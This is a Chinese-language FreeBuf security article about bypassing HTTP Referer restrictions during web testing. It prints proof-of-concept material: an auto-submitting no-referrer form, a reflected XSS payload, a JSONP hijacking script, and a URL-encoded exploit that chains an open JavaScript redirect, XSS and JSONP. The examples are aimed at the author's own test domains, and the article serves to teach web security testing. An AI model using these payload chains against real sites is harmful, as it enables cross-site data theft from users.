freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

GET请求Referer限制绕过总结
  • 关注
GET请求Referer限制绕过总结
2018-08-06 16:25:12

作者:Vulkey_Chen

原文来自:GET请求Referer限制绕过总结

前言

在做测试的时候会遇见这样几个漏洞场景:

  1. JSONP跨域劫持
  2. 反射XSS
  3. GET请求类型攻击

但是,在相对安全的情况下,都会有Referer(HTTP请求头)的限制。那么该如何去做绕过呢?

正文

什么是Referer?

Referer是请求头的一部分,假设A站上有B站的链接,在A站上点击B站的链接,请求头会带有Referer,而Referer的值为A站的链接;这也就是为什么上文所说的场景,遇见了Referer的限制就可能GG了。


image.png

绕过之道

常规绕过

一个实际场景:


image.png

先来说说一些常规化的东西:

  • 子域名方式

使用子域名的方式进行绕过:


image.png

  • 域名前增加

在域名前面增加随机的a-z和0-9也可以进绕过:

image.png

  • ?号

将域名作为GET请求参数进行绕过:


image.png

打破常规

无Referer

之前在做测试的时候,将Referer头删除也可以绕过,但是在真正的利用中能不能去实现呢?是可以的。

在HTML标签中有这样一个标签<meta>,而这个标签是表示无Referer,就是如下的代码:

<meta name="referrer" content="never">

我原来的PoC为:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/test.php">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

修改之后的PoC为:

<html>
  <meta name="referrer" content="never">
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/test.php">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


image.png

与其他资源组合

超链接

在上文就提到了A站有B站的链接,在A站点击B站的链接,Referer就为A站的链接了。那么在这里我能否使用白名单域下的业务做超链接,链接地址为A站存在问题的链接再搭配一个点击劫持或者诱导的方式进行组合攻击?

例如gh0st.cn做了Referer的限制:

RefererState
http://gh0st.cn (Current Domain)YES
http://www.hi-ourlife.cn (Other Domain)NO
http://a.gh0st.cn (SubDomain)YES

实际场景:

  • 公开信息对外

在个人中心处可以编辑个人的微博地址:


image.png

微博地址是对外的公开信息:

image.png

那么结合一下点击劫持或者用户常规的点击了~那就GGGGGGG了~

  • 论坛

现在很多厂商都有自己的开放论坛,特别是Discuz这种很多,而Discuz回复是可以使用超链接的:

回复这样的格式:u u部分为地址,t部分为地址名字~

URL跳转

302跳转是否可以?NO,不可以。

这里的URL跳转是值JavaScript的URL跳转。

常见的两个:

window.location.href="url";
window.open("url");

反射XSS(Referer限制)

  1. 这里我已经有一个存在任意URL跳转漏洞了:

http://test.vulkey.cn/link.php?url=http://www.hi-ourlife.com


image.png

  1. 我有一个反射XSS漏洞:

http://vulkey.cn/jsonp.php?callback=vulkey

当 referer = a.com :


image.png

当 referer = vulkey.cn :


image.png

当 referer = *.vulkey.cn :


image.png

这个接口验证了Referer使用之前的方法没办法绕过,于是采用组合拳搭配。

于是有了如下的构建:http://test.vulkey.cn/link.php?url=http://vulkey.cn/jsonp.php?callback=vulkey<svg/onload=alert(1)>

image.png

JSONP劫持+反射XSS+URL跳转

这个案例是基于上面反射XSS案例的,现在已知的三个问题:

  1. JSONP接口 http://vulkey.cn/jsonp.php?callback=vulkey 有Referer限制
  2. 反射XSS http://vulkey.cn/jsonp.php?callback=vulkey<svg/onload=alert(1)> 有Referer限制
  3. JavaScript URL跳转 http://test.vulkey.cn/link.php?url=http://www.hi-ourlife.com

一般JSONP跨域劫持的PoC是这样的:

<script>function jsonp2(data){alert(JSON.stringify(data));}</script>
<script src="url"></script>

但是因为有Referer限制,就不能在自己的站点上做PoC了,就只能利用反射XSS漏洞构建PoC:

http://vulkey.cn/jsonp.php?callback=%3Cscript%3Efunction+vulkey(data){alert(JSON.stringify(data));}%3C/script%3E%3Cscript+src=%22http://vulkey.cn/jsonp.php?callback=vulkey%22%3E%3C/script%3E

但仅仅如此是不够是因为XSS有Referer来源的限制,所以最终的PoC应该是这样的:

http://test.vulkey.cn/link.php?url=http://vulkey.cn/jsonp.php?callback=%253Cscript%253Efunction%2bvulkey%28data%29%7Balert%28JSON.stringify%28data%29%29%3B%7D%253C%2fscript%253E%253Cscript%2bsrc%3D%2522http%3A%2f%2fvulkey.cn%2fjsonp.php%3Fcallback%3Dvulkey%2522%253E%253C%2fscript%253E


image.png

也就是说在这里JS的URL跳转解决了XSS的Referer限制问题,而XSS又解决了JSONP接口的Referer限制问题,这是一个联合组合拳。如果你发现的XSS没有Referer限制则不需要这么"麻烦"。

结尾

文中总结一些小的TIPS,针对我遇到的实际案例进行了漏洞的复现截图,打开思维其实还有更多更好的思路,有机会后期会写出来。

有问题大家可以留言哦~也欢迎大家到春秋论坛中来玩耍呢!  >>>点击跳转

# referer # 限制绕过
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者